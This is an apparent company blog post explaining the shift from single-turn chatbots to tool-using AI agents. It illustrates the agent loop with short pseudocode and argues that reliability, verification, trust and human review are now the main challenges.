All posts

From Chatbots to Agents

The Mafold Team6 min read

For about two years, "using AI" meant typing into a box and reading what came back. You asked, it answered. The interface was a conversation, and the unit of work was a single, self-contained reply. That era produced something genuinely useful — and it is quietly ending.

The shift underway isn't mainly about models getting smarter, though they have. It's about what they're allowed to do. A chatbot returns text. An agent takes the text, runs a tool, reads the result, decides what to do next, and keeps going until the task is finished or it gets stuck. That loop — observe, decide, act, repeat — is the whole difference. Everything interesting about the current moment follows from it.

The chatbot was a demo, not a destination#

The single-turn assistant was never the goal; it was the first thing that worked. It was easy to build, easy to reason about, and easy to make safe: the model couldn't touch anything, so the worst it could do was be wrong in a sentence. That safety was also its ceiling. A system that can only talk can only ever advise. To draft the email, file the ticket, run the query, fix the test — someone still had to be the hands.

What changed is that models got reliable enough at a new skill: deciding which tool to call, with which arguments, and what to do with the answer. Tool use turned the assistant from a thing you consult into a thing that operates. The conversation is still there, but it's no longer the product — it's the control surface.

The one-line version

A chatbot answers a question. An agent owns an outcome. The model didn't just get better at talking — it got the ability to keep going.

What "agent" actually means now#

The word "agent" got stretched to cover everything, so it's worth being concrete. In practice the shift from 2025 to 2026 added three capabilities that compound:

  • Tools. The model can call functions, hit APIs, run code, search the web, and read files. Its output is no longer just words for a human — it's actions with consequences.
  • Memory and context. Longer context windows and external memory let a system carry state across many steps and sessions, so work doesn't reset every turn.
  • Long horizons. The model runs in a loop instead of a single shot. It can attempt, check its own result, recover from a failure, and try a different path — sometimes over dozens of steps without a human in between.

Strip the hype and the underlying pattern is mundane and powerful:

while not done:
    observation = look()        # read state, tool results, errors
    plan = think(observation)   # the model decides the next move
    result = act(plan)          # run a tool, edit a file, call an API
    done = check(result)        # did that work? are we finished?

Every "agent framework" is some version of this loop with guardrails bolted on. Coding agents were the first place it really landed, because software has a free oracle built in: the code either compiles and the tests pass, or they don't. The agent gets honest feedback on every step, which is exactly what a loop needs to not wander off. Wherever a domain has that kind of cheap, trustworthy signal, agents work surprisingly well. Where it doesn't, they struggle — and that distinction now matters more than raw model quality.

The bottleneck moved#

For years the limiting question was "how capable is the model?" That question hasn't gone away, but it's no longer the one that decides whether a project ships. The frontier models are, for most everyday tasks, already more capable than the products built on top of them know how to use. The constraint moved downstream — to reliability, verification, and trust.

Reliability#

A model that is right 95% of the time is a great assistant and a dangerous employee. In a single-turn chat, a 5% error rate is a minor annoyance you catch by reading. In a twenty-step agent loop, errors compound: small mistakes early become confident nonsense late, and the system can spend real money or make real changes before anyone notices. Going from "usually right" to "safe to leave alone" is a different and much harder engineering problem than the one that got us here.

Verification#

The deeper issue is that acting is easy to scale and checking is not. It's cheap to have an agent generate a thousand lines of code, a migration plan, or a research summary. It's expensive for a human to confirm all of it is correct. The cost of work is shifting from doing to reviewing, and a lot of the real design effort in 2026 goes into shrinking that review burden — tighter scopes, better traces, automatic tests, second models that critique the first. The teams that win aren't the ones with the smartest model; they're the ones who made its output cheap to trust.

Trust#

Autonomy and permission are now the same conversation. An agent that can read your files, send messages, and spend money is only as safe as the boundaries around it. "Prompt injection" stopped being a curiosity and became a real security surface the moment models started acting on content they read from the open web. The interesting work here is no longer just "make the model refuse bad requests" — it's "design systems where a compromised or confused agent can't do much damage in the first place."

The human's job changes#

When the model becomes the hands, the person becomes something closer to a lead than a typist. The skill that matters is no longer phrasing the perfect prompt; it's specifying outcomes clearly, setting the right boundaries, and reviewing work efficiently. You spend less time producing the first draft and more time deciding whether the draft is right — and being accountable for it either way.

This is genuinely uncomfortable, because reviewing is less satisfying than making, and because it's easy to rubber-stamp work that looks finished. The healthiest teams are treating agents the way they'd treat a fast, eager, slightly unreliable junior: give it real work, keep a tight feedback loop, and never ship what you didn't actually check.

Where this is heading#

If single-turn chat was AI as a tool, and the agent loop is AI as a worker, the next step is plainly visible: not one agent, but many — handing work to each other, running alongside the people who own the outcome, each with its own scope and permissions. Once a model can act, the natural question stops being "what can it say to me?" and becomes "how do we all work together?"

That's a harder question than it sounds, and it's mostly not a model problem. It's a coordination problem: who can see what, who's allowed to do what, how work gets handed off, and how a human stays in the loop without becoming the bottleneck. The last two years were about teaching models to act. The next few will be about the systems we build around them once acting is a given — and that's the part worth paying attention to.